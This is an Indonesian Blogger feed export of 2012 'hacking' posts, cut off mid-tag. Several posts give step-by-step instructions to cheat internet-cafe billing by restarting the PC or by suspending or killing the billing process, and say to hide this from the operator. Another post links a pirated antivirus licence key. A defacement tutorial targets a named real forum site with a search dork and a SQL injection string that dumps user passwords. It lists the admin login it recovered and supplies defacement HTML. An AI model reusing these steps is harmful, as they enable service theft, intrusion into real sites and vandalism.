- Jangan di pencet tombol yang kecil pada Bagian bawah CPU,, itu akan merestar komputer kita&lt;br /&gt;
-&amp;nbsp; Pencet lah tombol yang besar untuk menghidupkan kembali komputer kita,,,&lt;br /&gt;
- waktu komputer menyebutkan WELCOME ada program yang belum ditutup&lt;br /&gt;
- Pencet yang di tengah-tengahnya ,,udah deh ,, jendelah billing udah di
 jebool oleh program yang belum ditutup.., ,,, PERHATIAN TRIK INI JANGAN
 DIBERITAHU SAMA OPERATORNYA,,,, Ntar Operatornya Marah Sama 
Kalian,,,,,, APABILA ANDA SALAH GUNAKAN JANGAN MELIBAT KAN BLOG SYA 
INI,, KARNA SAYA HANYA MEMBERI ILMU HACKER KEPADA KALIAN SEMUAA,,,,, 
SEMOGA KALIAN BISA DENGAN TRIK SAYA INI,,..,, SEEEP&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; JANGAN LUPA 
GABUNG DI BLOG&lt;br /&gt;
&lt;br /&gt;
ATAU MAU PAKE CARA YANG INI...&amp;nbsp; &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2012/12/hack-billing-warnet-dengan-smadav.html&quot;&gt;Cara Hack Billing Warnet Dengan Smadav&lt;/a&gt;</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/69081270357091686/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/12/hack-billing-warnet-tanpa-software.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/69081270357091686'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/69081270357091686'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/12/hack-billing-warnet-tanpa-software.html' title='Hack Billing Warnet Tanpa Software'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_VB-LP3SFWG2qWd_xZpNO6VW1r8KJEgzgBpkLuVuSq1r4ogfnLsubAlHoxwFEJI2F87BkCGVSvkMIeb01QAFq-iBdQ33bVQuS8oZsSsNqpfQKV4-Pe8MJ3eXbQcmtq9D5YeTx5hLnQ-Y/s72-c/hacking.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-3177814486267468302</id><published>2012-12-16T04:48:00.002-08:00</published><updated>2013-01-24T05:54:56.818-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><title type='text'>Hack Billing Warnet Dengan Smadav</title><content type='html'>&lt;div align=&quot;justify&quot; style=&quot;background-color: transparent; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;&quot; title=&quot;Cara Hack Billing termudah&quot;&gt;
&lt;b&gt;Tutorial hack&lt;/b&gt;&amp;nbsp;ini membahas tentang&amp;nbsp;&lt;b&gt;Cara Hack Billing termudah&lt;/b&gt;, yaitu hanya menggunakan tool semacam Task Manager. Dan tool yang kita gunakan untuk&amp;nbsp;&lt;b&gt;hack billing&lt;/b&gt;&amp;nbsp;kali ini adalah tool Process Manager yang ada pada SMADAV. Tanpa perlu basa-basi lagi, berikut step by step&amp;nbsp;&lt;b&gt;Cara Hack Billing termudah&lt;/b&gt;&amp;nbsp;:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=6673678565909634405&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div align=&quot;justify&quot; style=&quot;background-color: transparent; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;&quot; title=&quot;Cara Hack Billing termudah&quot;&gt;
&lt;/div&gt;
&lt;ol style=&quot;background-color: transparent; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; text-align: left;&quot;&gt;
&lt;li&gt;Sebelumnya, disarankan bagi anda untuk memilih paket ketika 
internertan di warnet. Misal paket 2 jam. Kenapa harus memilih paket? 
Nanti anda senderi juga akan tahu alasannya.&lt;/li&gt;
&lt;li&gt;Yang anda butuhkan selanjutnya adalah SMADAV Antivirus, gunakan 
SMADAV yang portable atau yang sudah terinstal pada komputer anda. Bisa 
diambil dari folder C:\Program Files\Smadav. Atau bagi yang tidak ingin 
repot, bisa&amp;nbsp;&lt;a href=&quot;http://adf.ly/694773/www.ziddu.com/download/18644054/Smadav89.zip.html&quot; style=&quot;color: #017db0; outline: none;&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;DOWNLOAD DISINI&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;color: #343333;&quot;&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;Nah, sekarang anda sudah siap. Masuk ke warnet (pasang muka bego 
supaya anda tidak dicurigai, hehehe). Buka billing, pilih paket internet
 2 jam (setelah 2 jam, secara otomatis bllingnya akan menutup sendiri 
kan?).&lt;/li&gt;
&lt;li&gt;Buka SMADAV, masuk ke menu&amp;nbsp;&lt;b&gt;Tolls -&amp;gt; Process Manager&lt;/b&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIMRpJU4w6MfCSepeXxDJy0zgx4Frpe-pPtQpv6C7bFRzYkAHUEUSoH6YHwY3CbYCtwfkyzpV8whc6K5kM1IiL5fOdB3WzFYlRs_cJGOvl7U0KzCdhCn8Y1NSgiBJm-lgk7eDnim_DkdEq/s1600/billing.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;267&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIMRpJU4w6MfCSepeXxDJy0zgx4Frpe-pPtQpv6C7bFRzYkAHUEUSoH6YHwY3CbYCtwfkyzpV8whc6K5kM1IiL5fOdB3WzFYlRs_cJGOvl7U0KzCdhCn8Y1NSgiBJm-lgk7eDnim_DkdEq/s400/billing.JPG&quot; width=&quot;400&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;Cari process billingnya, lalu klik kanan pada processnya, pilih&amp;nbsp;&lt;b&gt;Action -&amp;gt; Suspend&lt;/b&gt;.
 Nah, dengan ini proses billingnya akan berhenti alias membeku. Namun 
yang berhenti hanya process billingnya, bukan timernya. Karena timernya 
dihitung dari komputer server. Maka dari itulah saya tadi menyarankan 
untuk memilih paket 2 jam. Karena proses billingnya sudah disuspend, 
meskipun sudah lewat 2 jam, anda bisa terus internetan sampai puas dan 
billingnya tidak akan menutup sendiri sebelum prosesnya anda resume :). 
Dan mengerikan lagi, anda bunuh saja prosesnya, dengan cara klik kanan,&amp;nbsp;&lt;b&gt;Action -&amp;gt; Kill&lt;/b&gt;. Dan saat itu juga billingnya akan hilang (kalau prosesnya anda kill seperti ini, anda tidak perlu paketan).&lt;/li&gt;
&lt;li&gt;Kalau anda sudah puas internetan, kembalikan proses billingnya dengan klik kanan proses billing, pilih&amp;nbsp;&lt;b&gt;Action -&amp;gt; Resume&lt;/b&gt;.&lt;br /&gt;Keluar
 dari warnet dan bayar ke operator (tetap pasang muka bego supaya tidak 
dicurigai, tapi kalau anda ketahuan oleh admin warnet dan sampe 
dipukuli. Jangan salahkan saya! Karena itu dosa anda sendiri.)&lt;/li&gt;
&lt;/ol&gt;
Seperti judulnya&amp;nbsp;&lt;b&gt;Cara Hack Billing termudah&lt;/b&gt;,&amp;nbsp;&lt;b&gt;cara hack billing&lt;/b&gt;&amp;nbsp;ini
 memang mudah. Selain menggunakan SMADAV, anda juga bisa menggunakan &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2012/12/hack-billing-warnet-tanpa-software.html&quot;&gt;Cara Hack Billing Warnet Tanpa Software&lt;/a&gt;. Dan jangan salah gunakan artikel 
ini, karena ini hanya bertujuan untuk pembelajaran</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/3177814486267468302/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/12/hack-billing-warnet-dengan-smadav.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/3177814486267468302'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/3177814486267468302'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/12/hack-billing-warnet-dengan-smadav.html' title='Hack Billing Warnet Dengan Smadav'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIMRpJU4w6MfCSepeXxDJy0zgx4Frpe-pPtQpv6C7bFRzYkAHUEUSoH6YHwY3CbYCtwfkyzpV8whc6K5kM1IiL5fOdB3WzFYlRs_cJGOvl7U0KzCdhCn8Y1NSgiBJm-lgk7eDnim_DkdEq/s72-c/billing.JPG" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-3974524649472666151</id><published>2012-12-12T06:22:00.000-08:00</published><updated>2012-12-12T06:22:39.237-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Download"/><title type='text'>Download Smadav</title><content type='html'>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipGkANrmGbkQlvEsvFoLpKkffSzLEi0e3D1H6WOUk1bO4NxzTV3hU55U69XSRkJhxWmiE84S8_PHDyEyr-FNrmEEAum8yYR_bsWUhlAt6BciPWJYsb1FcWqrRRpEya2AP4YiXSNtLQbSdi/s1600/download+smadav+pro+terbaru.jpg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Smadav Anti-Virus&quot; border=&quot;0&quot; height=&quot;150&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipGkANrmGbkQlvEsvFoLpKkffSzLEi0e3D1H6WOUk1bO4NxzTV3hU55U69XSRkJhxWmiE84S8_PHDyEyr-FNrmEEAum8yYR_bsWUhlAt6BciPWJYsb1FcWqrRRpEya2AP4YiXSNtLQbSdi/s200/download+smadav+pro+terbaru.jpg&quot; title=&quot;Smadav Anti-Virus&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;Hallo sobat semua,kali ini kami &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;Captain-Kid&lt;/span&gt;&lt;/a&gt;&lt;a href=&quot;http://team-freeanon.blogspot.com/&quot; target=&quot;_blank&quot;&gt;&lt;/a&gt; akan memposting smadav anti-virus.&lt;br /&gt;&lt;br /&gt;Langsung aja deh di simak dan dibaca..&lt;br /&gt;Check This Out...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span id=&quot;more-590&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;Berikut ini fitur Smadav 2010 Rev. Terbaru&lt;br /&gt;
* Penambahan database 23 virus lokal baru dan perbaikan beberapa false positive.&lt;br /&gt;
* Teknik heuristik baru yang bisa mendeteksi varian virus lokal dengan mudah asalkan salah satu variannya sudah ada di-database.&lt;br /&gt;
* Teknik heuristik VBS lebih akurat dan bertambah cerdas.&lt;br /&gt;
* Lebih stabil untuk digabung dengan semua AV internasional (mendeteksi 
AV lain di komputer dan jika tidak ada akan menyarankan AV internasional
 untuk segera di-install).&lt;br /&gt;
* Scan flashdisk sangat cepat hanya 5 detik (Smad-Ray) tidak hanya 
men-scan bagian terluar flashdisk saja, tapi juga sampai semua file di 
flashdisk.&lt;br /&gt;
* Smadav Pro yang di-password tidak mempunyai hak akses untuk mengubah registry dengan Smadav.&lt;br /&gt;
* Notifikasi (Balloon Tray) awal pada saat start-up sudah tidak ada lagi.&lt;br /&gt;
* Smad-behavior sudah sempurna dan dengan tampilan baru ketika memperingatkan user.&lt;br /&gt;
* Konfirmasi penambahan folder autorun.inf untuk pengebalan flashdisk 
sesaat setelah flashdisk terpasang, user bebas memilih untuk mengebalkan
 flashdisk-nya atau tidak.&lt;br /&gt;
* Folder Smad-Lock/Brankas Smadav tidak lagi otomatis ditambahkan di FD tapi harus manual lewat tab Smad-Lock.&lt;br /&gt;
* Penambahan tombol “more” di SMARTP alert.&lt;br /&gt;
&lt;br /&gt;Download Smadav 2012 Rev Terbaru&lt;br /&gt;* &lt;a href=&quot;http://www.smadav.net/&quot; target=&quot;_blank&quot;&gt;Download Smadav 9.2&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Key Smadav Pro Version Terbaru&lt;br /&gt;*&lt;a href=&quot;http://team-freeanon.blogspot.com/2012/06/lisensi-smadav-pro-version.html&quot; target=&quot;_blank&quot;&gt;Download Key Smadav 2012 Terbaru&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;Salah satu yang fitur yang bagus adalah pilihan untuk memasukkan/tidak 
Smart-Lock ke dalam flashdisk. Sehingga setiap memasukkan flashdisk 
tidak langsung diinstal autorun/Brankas Smadav. Smadav sebaiknya juga 
digabungkan dengan antivirus Internasional karena Smadav tidak dapat 
mengenali virus asing alias hanya bisa lokal.&lt;br /&gt;
&lt;br /&gt;Sekian postingan smadav dari &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;Captain-Kid&lt;/a&gt; semoga bermanfaat.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Wassalamualaikum Wr. Wb</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/3974524649472666151/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/12/download-smadav.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/3974524649472666151'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/3974524649472666151'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/12/download-smadav.html' title='Download Smadav'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipGkANrmGbkQlvEsvFoLpKkffSzLEi0e3D1H6WOUk1bO4NxzTV3hU55U69XSRkJhxWmiE84S8_PHDyEyr-FNrmEEAum8yYR_bsWUhlAt6BciPWJYsb1FcWqrRRpEya2AP4YiXSNtLQbSdi/s72-c/download+smadav+pro+terbaru.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-5729009086720550633</id><published>2012-12-11T23:13:00.000-08:00</published><updated>2013-01-24T05:53:08.008-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><title type='text'>Cara Deface Web</title><content type='html'>&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2012/12/cara-deface-web.html&quot; style=&quot;text-align: left;&quot; target=&quot;&quot;&gt;Cara Deface website Forum Sederhana Untuk Newbie&lt;/a&gt;&lt;span style=&quot;text-align: left;&quot;&gt;&amp;nbsp;- Siang sob, Pada tanggal 12-12-12 ini, saya akan memposting tutorial tentang&amp;nbsp;Cara Deface Website Forum Sederhana Untuk Newbie.&lt;/span&gt;&lt;/span&gt;&lt;b style=&quot;font-family: inherit; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2012/12/cara-deface-web.html&quot;&gt;&lt;span style=&quot;color: white; font-family: inherit; text-align: left;&quot;&gt;Apa Itu Deface ?&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;font-family: inherit; line-height: 18px;&quot;&gt;Deface/Defacing atau Cyber&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: inherit; line-height: 18px;&quot;&gt;Grafity secara umum diartikan sebagai aktifitas menodai atau merubah&lt;/span&gt;&lt;span style=&quot;font-family: inherit; line-height: 18px;&quot;&gt;&amp;nbsp;halaman depan web dengan kalimat, image atau link tertentu&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: inherit; line-height: 18px;&quot;&gt;yang tidak ada sangkut pautnya dengan misi web tersebut, Biasanya&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: inherit; line-height: 18px;&quot;&gt;peretas men-deface suatu halaman web dengan maksud supaya eksistensinya&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: inherit; line-height: 18px;&quot;&gt;diketahui oleh khalayak ramai.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white; font-family: inherit; line-height: 18px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY4dLHkRkcAnCXTZfNTRxurNH0uVH5hprC-w-Q6bGVRem-VLElA-euYSt64_OMnzIS8p8pwGZkCMYZmtutEKnPadJ2DEGexLPIJM_s8bE7SC1fBLVdETL1BEzid6bE3ExQIlSOlOeQT4Y8/s1600/anestya.bmp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;br /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2012/12/cara-deface-web.html&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: white; font-family: inherit;&quot;&gt;Cara Men-Deface Website Forum Sederhana Untuk Newbie :&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;1). Pertama&amp;nbsp;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;Ketik di google&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;inurl:/forums.asp?iFor=&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;2). Pilih target,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;Contoh target&lt;/span&gt;&lt;/span&gt; &lt;/div&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;a href=&quot;http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: white;&quot;&gt;http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=18&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/span&gt; &lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;3). Hapus angka dibelakang =&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;Hingga menjadi seperti ini&lt;/span&gt;&lt;/span&gt; &lt;/div&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;a href=&quot;http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;b&gt;http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;4). Setelah itu = masukan SQL inject&lt;/span&gt;&lt;br style=&quot;line-height: 18px; text-align: left;&quot; /&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users&lt;/span&gt;&lt;/span&gt; &lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;5). Hingga menjadi seperti ini&lt;/span&gt;&lt;/span&gt; &lt;/div&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;a href=&quot;http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users&quot;&gt;http://www.ecreators.co.uk/csuk_&lt;/a&gt; ...&amp;nbsp;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;from+users&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;Tulisan yang berderet di bawah nama 10 TOPICS itu adalah username&lt;/span&gt;&lt;br style=&quot;line-height: 18px; text-align: left;&quot; /&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;Tulisan yang berderet di bawah nama DATED itu adalah passwordnya&lt;/span&gt;&lt;/span&gt; &lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;6). Cari Username Admin &amp;amp; Passwordnya.&lt;/span&gt;&lt;span style=&quot;color: white; font-family: inherit; line-height: 18px; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white; font-family: inherit; line-height: 18px; text-align: left;&quot;&gt;Ok, pada web target yang jadi bahan tutor ini, saya menemukan username &amp;amp; password.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;[-] Username : admin&lt;/span&gt;&lt;br style=&quot;line-height: 18px; text-align: left;&quot; /&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;[-] Password : default&lt;/span&gt;&lt;/span&gt; &lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;7). Sekarang klik tulisan login yang berada diatas.&lt;/span&gt;&lt;br style=&quot;line-height: 18px; text-align: left;&quot; /&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;Nah... login udah berhasil&lt;/span&gt;&lt;br style=&quot;line-height: 18px; text-align: left;&quot; /&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;Sekarang jika ingin melakukan defacing, klik tulisan &quot;POST NEW TOPICS&quot;&lt;/span&gt;&lt;/span&gt; &lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;8). Isi Subjectnya...&lt;/span&gt;&lt;br style=&quot;line-height: 18px; text-align: left;&quot; /&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;Contoh : HACKED BY BLA BLA BLA&lt;/span&gt;&lt;br style=&quot;line-height: 18px; text-align: left;&quot; /&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;lalu masukin script deface HTMLnya ke kolom dibawah subject.&lt;/span&gt;&lt;/span&gt; &lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;&lt;span style=&quot;color: white; font-family: inherit;&quot;&gt;Jika ingin menutup full seluruh halaman, pake kode berikut :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;lt;div
 align=center&amp;gt;&amp;lt;DIV id=layer1 style=&quot;border-right: #000000 1px; 
border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; 
width: 1350px; border-bottom: black 1px; position: absolute; top: 0px; 
height: 698px; background-color: black; layer-background-color: 
black&quot;&amp;gt;&amp;lt;center&amp;gt;&lt;/span&gt;&amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;b&amp;gt;&amp;lt;font 
face=&quot;papyrus&quot; color=&quot;red&quot; size=&quot;5&quot;&amp;gt;Hacked By Secondangerz&amp;lt;/font&amp;gt;&amp;lt;/h2&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;img 
